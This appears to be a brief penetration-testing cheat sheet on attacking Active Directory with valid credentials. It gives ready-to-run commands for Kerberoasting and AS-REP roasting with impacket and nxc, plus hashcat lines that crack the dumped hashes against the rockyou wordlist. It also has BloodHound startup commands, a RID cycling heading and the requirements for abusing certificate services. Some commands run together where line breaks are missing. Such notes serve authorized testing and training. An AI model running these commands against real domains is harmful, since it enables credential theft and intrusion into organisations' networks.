Valid Credentials
1) Kerberoasting
impacket-getUserSPNs -request -dc-ip DC_IP domain/user:password -outputfile kerberoasted.txthashcat -a 0 -m 13100 kerberoasted.txt /usr/share/wordlists/rockyou.txt2) ASREProasting
nxc ldap DC_IP -u user -p password --kdchost DC_IP --asrephashcat -m 18200 -a 0 asreproasted.txt /usr/share/wordlists/rockyou.txt3) Bloodhound
sudo neo4j startsudo bloodhound4) RID Cycling
5) Active Directory Certificate Services (ADCS)
Requirements: User is in the Enrollment Group, Certificate Requesters group, or with Enroll/Autoenroll rights on a template and a Certificate Authority (CA) exists on the domain.
Last updated